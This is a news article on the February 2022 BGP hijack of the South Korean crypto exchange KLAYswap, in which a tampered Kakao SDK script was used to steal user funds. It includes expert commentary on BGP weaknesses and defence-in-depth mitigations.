Crypto Exchange KLAYswap Loses $1.9M After BGP HijackHackers Performed Border Gateway Protocol Hack to Conduct Illegal Transactions
Unknown hackers have stolen around $1.9 million from South Korean cryptocurrency platform KLAYswap using a Border Gateway Protocol hack in the server infrastructure of one of its suppliers.
BGP is a gateway protocol that enables the internet to exchange routing information between autonomous systems. As networks interact with each other, they need a way to communicate. This is accomplished through peering, which BGP makes possible. Without it, networks would not be able to send and receive information with each other, Fortinet researchers say.
The attack on KLAYswap was a BGP hijack, in which attackers manipulated the network flow and configured it so that the users connected to KLAYswap could download malicious code from the server sent by the attacker rather than the normal Software Development Kit file or KakaoTalk, a popular South Korean instant messaging, marketing and customer service application used by the cryptocurrency exchange platform.
Dr. Xinxin Fan, IoTeX co-founder and head of blockchain, described how these dedicated, crafted attacks leverage the BGP hijack to inject malicious code into a user's browser and then steal the victim's funds. Fan, a cryptographer and a cybersecurity expert who has worked for Facebook and Google, tells Information Security Media Group: "Such an attack highlights that security is a multilayer issue and cryptocurrency platforms should apply the defense-in-depth approach to protect their customers' assets."
This is the fourth cryptocurrency attack over the past month - the most recent being last week’s hit on Meter, a blockchain infrastructure company that provides multichain bridging and allows users to trade multiple cryptocurrencies across Ethereum and other public chains, which were exploited for around $4.4 million. This was preceded by the Wormhole network attack on a token bridge that allows users to trade multiple cryptocurrencies across the Ethereum and Solana blockchains, which was exploited for 120,000 ETH tokens - valued at $321 million - and an earlier attack on Qubit Finance, which runs on the Binance Smart Chain and was hacked for more than $80 million.
KLAYswap is an instant swap protocol that operates with an on-chain liquidity pool, in which liquidity is guaranteed by automated market-making mechanisms. An on-chain swap service allows any KLAY or KCT-type-token cryptocurrency user to become a liquidity provider and earn income from transaction fee commissions.
A spokesperson for KLAYswap did not immediately respond to ISMG's request for comment.
Roger Grimes, data-driven defense evangelist at KnowBe4, says if a BGP exploit can be used to intercept critical data, it means the upper-layer protocols and applications are not configured correctly and suggests it's not hard to defeat BGP attacks.
Grimes says that if integrity checks and encryption are implemented at the upper layers originating at the involved endpoints, the BGP intercept at most will causes temporary service interruption but won’t be able to eavesdrop on the involved data.
"It is a failure at the upper layers and the people who manage them that allows these types of attacks to happen. The owners of the BGP routers didn't implement any of the recommended offsets and the owners and managers of the upper-layer protocols and services also didn't implement recommended mitigations. It's a failure at both lower and upper levels," Grimes says.
"Based on the old version of KLAYswap (around January 4), the attacker changed all transaction requests of users to either directly send or approve the user's token to their contract and load it on the KLAYswap site. By changing the Kakao SDK script, the malicious code was created in the form of interfering with the operation of the existing KLAYswap code and allowing its own code to be executed," the developers say. "If a transaction occurred with corrupted logic, the user's assets were approved for use or the assets were transferred directly to the attacker's address."
KLAYswap developers say they blocked all functions of KLAYswap and performed an emergency check to prevent further damage after the incident was identified. The operation of Klaytn minter, a blockchain platform in the bridge, was restricted to prevent the transfer of stolen assets to other exchange platforms through the Orbit Bridge.
The researchers say that they removed the infected Kakao SDK file and identified both the wallet address and asset list exposed to the smart contract used by the hacker.
South Korean cybersecurity firm S2W analyzed the attack and found that the malicious code was distributed only to users who accessed it through KLAYswap by checking the referrer value of the HTTP header when connecting. Other users received a server-side error. That is how the SW researchers knew that the access to services other than that using the SDK has been disrupted.
"Due to this attack, if a KLAYswap user requested asset deposit, swap, withdrawal, etc. from 11:30 to 1:30 on the 3 February, coins were immediately transferred to the hacker's wallet specified in the malicious code, and the blockchain transaction is analyzed. As a result, the stolen coin was worth about 2.2 billion won ($1.9 million), but it was confirmed that the actual attacker finally stole a coin worth about 1 billion won ($835,000)," S2W researchers say.
Researchers say that the contaminated BGP routing paths updated by the attacker at the time start from AS9457 were operated by the domestic Dreamline company and manipulated by the attacker and used for the attack.
The researchers say that the Kakao SDK file download path is connected with the HTTPS protocol and even after a BGP hijacking attack has been performed, the certificate does not match and a normal response cannot be given. To fix this, however, attackers issued and registered a certificate for the developers[.]kakao.com domain through a service provided free of charge for three months by an overseas SSL certificate issuer called ZeroSSL.
"This arbitrary certificate registration is possible because the routing policy is already corrupted due to BGP Hijacking," the researchers say.
"An Entrenched Protocol'
Grimes says it is unfortunate that more service implementers aren't paying attention and doing something about such attacks, since they have known about BGP hijack attacks for decades and mitigations for them exist.
"It points to the difficulty of fixing an entrenched protocol used by a lot of people. Perhaps the real question is how to better motivate people - the human layer - to care enough to do something about it? Although we should keep in mind that 90% or more of online attacks occur because of social engineering and unpatched software, BPG attacks account for less than 1% of 1% of 1%. Where should our first and best focus be?" Grimes asks.